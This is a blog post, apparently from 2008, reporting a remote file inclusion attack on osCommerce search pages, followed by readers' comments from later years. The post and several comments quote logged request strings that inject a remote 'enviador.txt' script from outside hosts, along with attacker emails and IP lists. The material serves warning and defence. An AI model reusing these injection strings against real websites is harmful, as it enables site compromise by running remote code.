Jun 1, 2008

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a php script located at.
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=¶=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the OSCOMMERCE search routine.

10 comments:

  1. AnonymousThursday, October 15, 2009 at 6:19:00 AM CDT

    also
    http://www.neobundao.com/enviador.txt?&servidor=
    and
    http://www.darkhand.net/Bots/enviador.txt?&

    ReplyDelete
  2. AnonymousWednesday, March 24, 2010 at 11:52:00 PM CDT

    Another one http://www.opengear.at/rotator/enviador.txt

    ReplyDelete
  3. AnonymousThursday, March 25, 2010 at 12:06:00 AM CDT

    hacker also using email kbtcone@yahoo.com and enviador.txt file to attack oscommerce sites

    ReplyDelete
  4. Abhishek SachanSunday, December 11, 2011 at 2:08:00 PM CST

    who the hell they are ... trying same on 4 of my websites... URL:[/index.php?p=http://premmy.myftp.biz:8080/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com][/index.php?p=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com] From IP:{173.201.253.28, 194.24.252.101, 200.58.112.125, 200.80.36.148, 202.67.226.122, 208.109.186.113, 208.109.98.121, 218.189.139.238, 41.208.148.72, 62.156.178.189, 69.175.85.82, 72.167.48.2} I think we must block these IP

    ReplyDelete
  5. AnonymousFriday, March 16, 2012 at 11:33:00 PM CDT

    Not just OSCommerce websites are affected. Joomla sites are also vulnerable to this attack, usually with the e-mailaddress premmy35@gmail.com

    I detect this kind of attack on my websites on an almost daily basis. What can be done for this to be stopped permanently?

    [BVS]

    ReplyDelete
  6. AnonymousFriday, March 16, 2012 at 11:35:00 PM CDT

    @Abhishek Sachan - blocking the IP addresses was also something that came into my mind but I'm afraid it won't do any good as the attacker(s) use another IP every time. I have detected attempts originating from Taiwanese, Russian, Polish, Iranian and German addresses.

    [BVS]

    ReplyDelete
  7. Abhishek SachanSunday, March 18, 2012 at 11:13:00 AM CDT

    yeah you are right.. blocking IP is something difficult for them but i have something new in my mind not implemented yet... we can detect their user_agents they are generally of type bots.. there are databases present online which can tell u about the useragents we can block them by scripts but this method can also fail bcoz its easy to change user agent...

    ReplyDelete
  8. tmasterSunday, March 18, 2012 at 11:16:00 AM CDT

    If you install M&M Autoban you can ban the action they are taking it will then take care of banning the IPS it detects doing this.

    Add the URSLS and email addresses to the hackers file, In most cases they are already in it. Look for a new version soon as the next upgrade will let you ban countries you do not want on your site.

    ReplyDelete
  9. citizenbloggerMonday, June 16, 2014 at 8:49:00 AM CDT

    I also detect in my web server logs a similar attack but using "sexycabrito@gmail.com" instead of "premy35@gmail.com", can someone give me please more explanation about the mechanisme of this attack

    best regards

    ReplyDelete
  10. citizenbloggerMonday, June 16, 2014 at 8:51:00 AM CDT

    hello
    i have the same logs appear in my web server but using "sexycabrito@gmail.com" instead of "premy35@gmail.com" can anybody gves me more explanation about these attacks
    thanxs
    best regards

    ReplyDelete